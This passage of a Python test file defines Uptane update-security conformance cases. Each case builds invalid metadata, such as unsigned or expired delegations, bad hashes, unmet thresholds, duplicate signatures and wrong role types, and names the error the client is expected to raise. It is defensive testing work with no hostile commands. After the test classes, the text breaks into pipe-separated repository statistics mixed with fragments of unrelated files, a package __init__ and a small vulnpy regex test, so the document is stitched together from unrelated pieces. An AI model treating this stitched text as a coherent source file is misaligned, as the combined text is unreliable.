paths=[DEFAULT_TARGET_NAME],
terminating=False,
threshold=1,
**kwargs
),
**kwargs
),
]
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': __delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationUnsignedUptane(Uptane):
'''The delegated metadata has no signatures'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': [],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationBadKeyIdsUptane(Uptane):
'''The top-level targets metadata has bad key IDs for a delegated role'''
class ImageStep(Step):
UPDATE_ERROR = 'BadKeyId'
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations_bad_key_ids': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationMissingUptane(Uptane):
'''A delegation's metadata is unavailable'''
class ImageStep(Step):
UPDATE_ERROR = 'DelegationMissing::' + MISSING_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
MISSING_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegation_name': MISSING_DELEGATION_NAME,
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationEmptyUptane(Uptane):
'''The target is not present in the delegated role'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should perhaps be a failure in the images repo, since that is where
# the target is missing, but that doesn't work. The error could also be
# more accurate.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationHashMismatchUptane(Uptane):
'''The delegation has a target with bad hashes'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
def __targets(hardware_id: str, ecu_identifier: str = None) -> list:
return [Target(name=DEFAULT_TARGET_NAME,
content=DEFAULT_TARGET_CONTENT,
hardware_id=hardware_id,
ecu_identifier=ecu_identifier,
alteration='bad-hash')]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets': __targets,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should be a failure in the images repo, since that is where the
# target is missing, but that doesn't work.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationExpiredUptane(Uptane):
'''The delegated metadata has expired'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'is_expired': True,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
# Should be a failure in the images repo, since that is where the
# target is missing, but that doesn't work. The error could also be
# more accurate.
TARGET_ERRORS = {
DEFAULT_TARGET_NAME: 'TargetMismatch',
}
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationSnapshotMissingUptane(Uptane):
'''The snapshot metadata does not list a delegation'''
class ImageStep(Step):
UPDATE_ERROR = 'VersionMismatch::' + SKIPPED_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
SKIPPED_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegation_name': SKIPPED_DELEGATION_NAME,
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationSnapshotVersionMismatchUptane(Uptane):
'''The snapshot metadata expects a newer version of a delegation'''
class ImageStep(Step):
UPDATE_ERROR = 'VersionMismatch::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'snapshot_version': 2,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationZeroThresholdUptane(Uptane):
'''A delegation has a threshold of zero.'''
class ImageStep(Step):
UPDATE_ERROR = 'IllegalThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegation_threshold': 0,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationUnmetThresholdUptane(Uptane):
'''A delegation has an unmet threshold'''
class ImageStep(Step):
UPDATE_ERROR = 'UnmetThreshold::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6, 7]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX[0:-1],
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationTwoSignaturesUptane(Uptane):
'''Simple delegation case with two signatures required'''
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6, 7]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DelegationNonUniqueSignaturesUptane(Uptane):
'''A delegation has duplicate signatures'''
# Note that at present, the threshold is only set to 1, so one could argue
# this should not be an error, just a warning. (This also affects the other
# non-unique signature tests.)
class ImageStep(Step):
UPDATE_ERROR = 'NonUniqueSignatures::' + DEFAULT_DELEGATION_NAME
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
DELEGATION_KEYS_IDX = [6]
DELEGATIONS = {
DEFAULT_DELEGATION_NAME: {
'targets_keys_idx': DELEGATION_KEYS_IDX,
'targets_sign_keys_idx': DELEGATION_KEYS_IDX + DELEGATION_KEYS_IDX,
},
}
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'targets': lambda ecu_id, hw_id: [],
'delegations_keys_idx': DELEGATION_KEYS_IDX,
'delegations': Step.default_delegations,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorRootRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
Director role Root: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'SecurityException::Root'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class DirectorTargetsRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
Director role Targets: _type = "Targets"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
UPDATE_ERROR = 'SecurityException::Targets'
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepRootRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Root: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Root'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'_type': 'invalidrole',
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepTargetsRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Targets: _type = "Targets"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Targets'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
'_type': 'invalidrole',
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoSnapshotRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Snapshot: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Snapshot'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'_type': 'invalidrole',
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
class ImageRepoTimestampRoleTypeMismatchUptane(Uptane):
"""
The type of role must have an appropriate name in the metadata file.
ImageRepo role Snapshot: _type = "Root"
"""
class ImageStep(Step):
TARGETS_KEYS_IDX = [1]
SNAPSHOT_KEYS_IDX = [2]
TIMESTAMP_KEYS_IDX = [3]
UPDATE_ERROR = 'SecurityException::Timestamp'
ROOT_KWARGS = {
'root_keys_idx': [0],
'targets_keys_idx': TARGETS_KEYS_IDX,
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
SNAPSHOT_KWARGS = {
'snapshot_keys_idx': SNAPSHOT_KEYS_IDX,
}
TIMESTAMP_KWARGS = {
'timestamp_keys_idx': TIMESTAMP_KEYS_IDX,
'_type': 'invalidrole',
}
class DirectorStep(Step):
TARGETS_KEYS_IDX = [5]
ROOT_KWARGS = {
'root_keys_idx': [4],
'targets_keys_idx': TARGETS_KEYS_IDX,
}
TARGETS_KWARGS = {
'targets_keys_idx': TARGETS_KEYS_IDX,
}
STEPS = [
(DirectorStep, ImageStep),
]
| 24.588858
| 128
| 0.561782
| 10,294
| 104,601
| 5.253837
| 0.029823
| 0.239835
| 0.207607
| 0.16153
| 0.915315
| 0.910249
| 0.901059
| 0.88697
| 0.87926
| 0.875728
| 0
| 0.008643
| 0.347377
| 104,601
| 4,253
| 129
| 24.594639
| 0.783608
| 0.054177
| 0
| 0.741957
| 0
| 0
| 0.163942
| 0.011842
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006096
| false
| 0
| 0.001355
| 0.004741
| 0.117508
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9125b210c8bf5e608391eb8a039fe89233ad7720
| 41
|
py
|
Python
|
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | 8
|
2021-12-09T09:45:52.000Z
|
2022-01-24T09:58:30.000Z
|
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | null | null | null |
ycm/__init__.py
|
chinosk114514/ycm-api
|
249e3dd985bc758b719564f5e20010e606b50921
|
[
"MIT"
] | null | null | null |
from . import query
from . import server
| 13.666667
| 20
| 0.756098
| 6
| 41
| 5.166667
| 0.666667
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195122
| 41
| 2
| 21
| 20.5
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
912b59c2f97a7271614a8a3530723bfd0c642345
| 167
|
py
|
Python
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 7
|
2021-03-23T17:40:45.000Z
|
2022-03-14T16:07:27.000Z
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 27
|
2020-06-29T13:35:45.000Z
|
2022-01-21T07:10:55.000Z
|
tests/trigger/test_redos.py
|
davidaustinarcher/vulnpy
|
692703dae701197fd42ae7fc5a9d52f05a501550
|
[
"MIT"
] | 14
|
2020-07-26T18:23:16.000Z
|
2022-03-09T13:44:53.000Z
|
from vulnpy.trigger import redos
def test_re_fullmatch():
redos.do_re_fullmatch("a")
def test_re_fullmatch_compiled():
redos.do_re_fullmatch_compiled("a")
| 16.7
| 39
| 0.766467
| 25
| 167
| 4.72
| 0.48
| 0.372881
| 0.152542
| 0.305085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 9
| 40
| 18.555556
| 0.813793
| 0
| 0
| 0
| 0
| 0
| 0.011976
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
e689dfcea15e90ccab655bb36e285ffc7285b2f5
| 31,549
|
py
|
Python
|
